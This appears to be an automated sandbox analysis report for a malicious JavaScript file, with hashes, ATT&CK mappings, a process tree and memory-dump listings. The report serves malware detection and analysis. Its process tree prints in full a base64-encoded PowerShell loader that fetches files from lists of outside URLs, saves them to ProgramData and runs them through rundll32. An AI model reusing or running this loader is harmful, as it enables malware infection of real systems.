9d4215d3a3e926379bc2740bc427f91237a4e7f46ed0c9e46173827e03db026e

General

Target

QuiveredDistend.js
Size

300KB
MD5

e39ee46117c94e722fbe24f8f01ce565
SHA1

d3f8a2581de2ecd8c9fc2f8ba432f5bf6a0dd723
SHA256

9d4215d3a3e926379bc2740bc427f91237a4e7f46ed0c9e46173827e03db026e
SHA512

eb8f80581829a7bfe3a5b5902e97abe7c873c9c608b40126ba00c9b6124f0c37e0eb9da711d16ecb75180ac99351230982b0bc6fc5b8c9480b5a57856808a9f5
SSDEEP

6144:fmchxKSkckSpuuoKp0xNBBwKdBFyQ+Zq2K6umeDOtxsdCZf58V7rePUBP++k5FNQ:umxKSkckSphTp0xNBBwKdB7Wq2K6TiEa

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
268	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	268	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1232 wrote to memory of 1420	1232	wscript.exe	28
PID 1232 wrote to memory of 1420	1232	wscript.exe	28
PID 1232 wrote to memory of 1420	1232	wscript.exe	28
PID 1420 wrote to memory of 268	1420	wscript.exe	29
PID 1420 wrote to memory of 268	1420	wscript.exe	29
PID 1420 wrote to memory of 268	1420	wscript.exe	29

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\QuiveredDistend.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1232
- C:\Windows\System32\wscript.exe
  "C:\Windows\System32\wscript.exe" "C:\ProgramData\jellilySuperirritability.js" UnstringingJeewhillijers allothigenic SanguiniferousStrepsipteral urophobia
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1420
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABQAGwAbwBpAGQAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQARQBBAE8AQQBBAHUAQQBEAGsAQQBNAFEAQQB1AEEARABJAEEATQB3AEEAMQBBAEMANABBAE0AUQBBADQAQQBEAFUAQQBZAEEAUwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEgAQQBIAEkAQQBhAFEAQgB0AEEARwAwAEEAWgBRAEEAdQBBAEcAMABBAFoAUQBCAHQAQQBHADgAQQBjAGcAQgBwAEEARwBFAEEAYgBBAEEAPQAiADsAJABTAGgAcgBpAG0AcABpACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBrAEEARwBVAEEAYQBBAEIAMQBBAEcAMABBAFkAUQBCAHUAQQBHAGsAQQBjAHcAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEwAZwBCAG4AQQBHADgAQQBiAEEAQgBrAEEAQQA9AD0APQBrAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQAUQBBAE4AUQBBAHUAQQBEAEUAQQBNAHcAQQAwAEEAQwA0AEEATwBRAEEANABBAEMANABBAE0AUQBBADUAQQBEAGMAQQAiADsAJABwAGwAYQB0AHkAaABpAGUAcgBpAGMARABhAGMAdAB5AGwAaQBvAGcAbAB5AHAAaAB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA1AEEARABnAEEATABnAEEAeABBAEQAWQBBAE4AUQBBAHUAQQBEAGMAQQBPAEEAQQB1AEEARABFAEEATwBBAEEAegBBAEEAPQA9AEIAbABwAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAUQBBAGMAZwBCAGgAQQBHAGMAQQBiAHcAQgB0AEEARwBFAEEAYgBnAEIAcABBAEcATQBBAEwAZwBCAHkAQQBHADgAQQBZAHcAQgByAEEASABNAEEAIgA7ACQAZQBiAG8AbgBpAGUAcwBVAG4AZABlAHYAaQBvAHUAcwBuAGUAcwBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATQBRAEEAdQBBAEQAZwBBAE0AZwBBAHUAQQBEAEkAQQBNAGcAQQB6AEEAQwA0AEEATwBBAEEAMQBBAEMAOABBAFcAUQBCAHQAQQBFAFkAQQBjAHcAQQB2AEEARwBvAEEATwBRAEEAPQBOAFIATwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEUAQQBOAGcAQQB1AEEARABFAEEATwBRAEEANABBAEMANABBAE0AUQBBADAAQQBEAGcAQQBMAGcAQQA0AEEARABBAEEATAB3AEIARwBBAEQAWQBBAFIAQQBCAGwAQQBGAGMAQQBMAHcAQQA0AEEARQBzAEEAZQBBAEEAPQBOAFIATwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAFEAQQB1AEEARABFAEEATQB3AEEAMQBBAEMANABBAE0AZwBBADEAQQBEAEkAQQBMAGcAQQAzAEEARABBAEEATAB3AEIARABBAEcAUQBBAFUAUQBBAHYAQQBGAGMAQQBOAFIATwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEUAQQBOAFEAQQB1AEEARABJAEEATQB3AEEAMABBAEMANABBAE0AUQBBADQAQQBEAGsAQQBMAGcAQQAwAEEARABZAEEATAB3AEIAeABBAEYARQBBAFcAUQBBADAAQQBFAEkAQQBMAHcAQgBNAEEAQQA9AD0ATgBSAE8AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABRAEEATwBRAEEAdQBBAEQARQBBAE4AUQBBADAAQQBDADQAQQBNAFEAQQAxAEEARABrAEEATABnAEEANQBBAEQAZwBBAEwAdwBCAFEAQQBIAEEAQQBWAFEAQgBaAEEARgBnAEEATAB3AEIAQwBBAEgARQBBAFQAQQBCAG0AQQBGAFUAQQBTAFEAQgBaAEEASABnAEEAZABnAEIARgBBAEYAZwBBAGEAZwBBAD0ATgBSAE8AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE0AZwBBAHgAQQBDADQAQQBNAGcAQQB6AEEAQwA0AEEATgBnAEEAeABBAEMAOABBAE8AUQBCAGgAQQBEAFkAQQBOAHcAQgB3AEEARwBVAEEAYwB3AEEAdgBBAEUAawBBAE4AdwBCAHcAQQBIAGsAQQBhAFEAQgBoAEEARgBvAEEAUQBRAEEAPQBOAFIATwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBNAFEAQQB3AEEARABRAEEATAB3AEIAVQBBAEUAdwBBAFIAdwBCAG8AQQBFADQAQQBaAEEAQQB2AEEARgBVAEEAVQBBAEIAcABBAEcAbwBBAFQAdwBBAD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAVQBuAHMAcABlAGMAawBlAGQAQQBjAHQAaQBuAGkAbwBjAGgAcgBvAG0AZQAgAGkAbgAgACQAZQBiAG8AbgBpAGUAcwBVAG4AZABlAHYAaQBvAHUAcwBuAGUAcwBzACAALQBzAHAAbABpAHQAIAAiAE4AUgBPACIAKQAgAHsAdAByAHkAIAB7ACQAUwBsAGkAbgBrAGkAZQByAEMAaABvAHIAZQBnAHIAYQBwAGgAZQByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEANABBAEMANABBAE4AdwBBADEAQQBDADQAQQBOAHcAQQA1AEEAQwA0AEEATwBRAEEAeQBBAEEAPQA9AG8AYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBRAEEAdwBBAEMANABBAE4AZwBBADIAQQBDADQAQQBNAFEAQQAzAEEARABrAEEATABnAEEAeABBAEQATQBBAE0AUQBBAD0AbwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFQAQQBIAFUAQQBiAGcAQgB5AEEARwA4AEEAYgB3AEIAdABBAEgATQBBAFYAUQBCAHUAQQBIAE0AQQBZAHcAQgB2AEEARwA4AEEAYwBBAEIAbABBAEcAUQBBAEwAZwBCAG0AQQBIAFUAQQBiAGcAQgBrAEEAQQA9AD0AbwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAHcAQQB5AEEAQwA0AEEATQBRAEEAdwBBAEQASQBBAEwAZwBBAHgAQQBEAFUAQQBNAFEAQQB1AEEARABFAEEATQBRAEEAegBBAEEAPQA9ACIAOwAkAGMAeQBjAGwAbwBuAG8AbABvAGcAaQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAEEAQQBZAFEAQgB5AEEARwBRAEEAYgB3AEIAdQBBAEYAQQBBAFkAUQBCAHoAQQBHAGcAQQBhAHcAQgBoAEEAQwA0AEEAYgBRAEIAaABBAEgASQBBAGEAdwBCAGwAQQBIAFEAQQBhAFEAQgB1AEEARwBjAEEAVwBVAFkAUwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADQAQQBEAFkAQQBMAGcAQQB5AEEARABNAEEATQBBAEEAdQBBAEQASQBBAE0AZwBBAHoAQQBDADQAQQBPAEEAQQB3AEEAQQA9AD0AIgA7ACQARwBlAGwAYQB0AGkAbgBhAHQAZQBkAEUAYwBkAHkAcwBpAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVQBuAHMAcABlAGMAawBlAGQAQQBjAHQAaQBuAGkAbwBjAGgAcgBvAG0AZQApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAEcAZQBsAGEAdABpAG4AYQB0AGUAZABFAGMAZAB5AHMAaQBzACAALQBPACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAEsAYQBsAGwAZQBnAGUAUwBoAGEAcgBkAHkALgByAGEAbQBwAGEAcgB0AGUAZABVAG4AdABlAGwAaQBjADsAJABVAG4AZwByAGkAZQB2AGUAZABSAGEAdAB0AGUAbgBlAHIAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgATQBBAGQAQQBCAGgAQQBHAHcAQQBaAFEAQgB5AEEARQBrAEEAYgBRAEIAdABBAEcAawBBAFoAdwBCAHkAQQBHAEUAQQBkAEEAQgB2AEEASABJAEEATABnAEIAegBBAEgAUQBBAGUAUQBCAHMAQQBHAFUAQQAiADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABLAGEAbABsAGUAZwBlAFMAaABhAHIAZAB5AC4AcgBhAG0AcABhAHIAdABlAGQAVQBuAHQAZQBsAGkAYwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIAOAAwADcANAA3ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARQBzAEEAWQBRAEIAcwBBAEcAdwBBAFoAUQBCAG4AQQBHAFUAQQBVAHcAQgBvAEEARwBFAEEAYwBnAEIAawBBAEgAawBBAEwAZwBCAHkAQQBHAEUAQQBiAFEAQgB3AEEARwBFAEEAYwBnAEIAMABBAEcAVQBBAFoAQQBCAFYAQQBHADQAQQBkAEEAQgBsAEEARwB3AEEAYQBRAEIAagBBAEMAdwBBAFkAZwBCAHAAQQBHADQAQQBaAEEAQQA3AEEAQQA9AD0AIgA7ACQAVQByAGkAbgBhAHIAaQBlAHMATgBvAG4AZQBsAG8AcABlAG0AZQBuAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAE0AQQBHAGsAQQBiAGcAQgBzAEEARwBVAEEAZQBRAEIAVwBBAEcAawBBAGIAQQBCAHMAQQBHAGsAQQBZAFEAQgAxAEEARwAwAEEAYQBRAEIAMABBAEcAVQBBAEwAZwBCADEAQQBHAHMAQQByAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AZwBBAHcAQQBDADQAQQBNAFEAQQAzAEEARABZAEEATABnAEEAeABBAEQARQBBAE4AQQBBAHUAQQBEAEUAQQBPAFEAQQB4AEEAQQA9AD0AcgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAFEAQQB4AEEAQwA0AEEATwBRAEEANQBBAEMANABBAE0AZwBBADAAQQBEAGMAQQBMAGcAQQB5AEEARABNAEEATgBnAEEAPQByAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAVQBBAGIAZwBCAHkAQQBHADgAQQBZAGcAQgBsAEEAQwA0AEEAWgBRAEIANABBAEgAQQBBAGMAZwBCAGwAQQBIAE0AQQBjAHcAQQA9ACIAOwAkAEMAaABpAG4AYQBmAGkAcwBoACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABZAEEATwBRAEEAdQBBAEQAWQBBAE4AZwBBAHUAQQBEAFkAQQBOAFEAQQB1AEEARABFAEEATwBBAEEAeABBAEEAPQA9AFIAcABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEIAQQBIAEkAQQBaAFEAQgB2AEEASABRAEEAWgBRAEIAagBBAEgAUQBBAGIAdwBCAHUAQQBHAGsAQQBZAHcAQgB6AEEARgBJAEEAWgBRAEIAawBBAEcAawBBAGMAQQBCAHcAQQBHAGsAQQBiAGcAQgBuAEEAQwA0AEEAYwBnAEIAMQBBAEcAZwBBAGMAZwBBAD0AUgBwAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdwBBAEcARQBBAGMAZwBCAHkAQQBHADgAQQBjAFEAQgAxAEEARwBVAEEAZABBAEIAQgBBAEcASQBBAFoAUQBCAGoAQQBHAFUAQQBaAEEAQgBoAEEASABJAEEAYQBRAEIAMQBBAEgATQBBAEwAZwBCAGoAQQBHADgAQQAiADsAYgByAGUAYQBrADsAfQB9ACAAYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADsAfQB9AA=="
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:268

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\jellilySuperirritability.js

Filesize
300KB

MD5
e39ee46117c94e722fbe24f8f01ce565

SHA1
d3f8a2581de2ecd8c9fc2f8ba432f5bf6a0dd723

SHA256
9d4215d3a3e926379bc2740bc427f91237a4e7f46ed0c9e46173827e03db026e

SHA512
eb8f80581829a7bfe3a5b5902e97abe7c873c9c608b40126ba00c9b6124f0c37e0eb9da711d16ecb75180ac99351230982b0bc6fc5b8c9480b5a57856808a9f5

Download Submit
memory/268-60-0x000000001B120000-0x000000001B402000-memory.dmp

Filesize
2.9MB

Download
memory/268-61-0x0000000002040000-0x0000000002048000-memory.dmp

Filesize
32KB

Download
memory/268-62-0x00000000023E0000-0x0000000002460000-memory.dmp

Filesize
512KB

Download
memory/268-63-0x00000000023E0000-0x0000000002460000-memory.dmp

Filesize
512KB

Download
memory/268-64-0x00000000023E0000-0x0000000002460000-memory.dmp

Filesize
512KB

Download
memory/268-65-0x00000000023E0000-0x0000000002460000-memory.dmp

Filesize
512KB

Download
memory/268-66-0x00000000023E0000-0x0000000002460000-memory.dmp

Filesize
512KB

Download
memory/268-68-0x00000000023E0000-0x0000000002460000-memory.dmp

Filesize
512KB

Download
memory/268-67-0x00000000023E0000-0x0000000002460000-memory.dmp

Filesize
512KB

Download
memory/268-69-0x00000000023E0000-0x0000000002460000-memory.dmp

Filesize
512KB

Download

Analysis

Sharing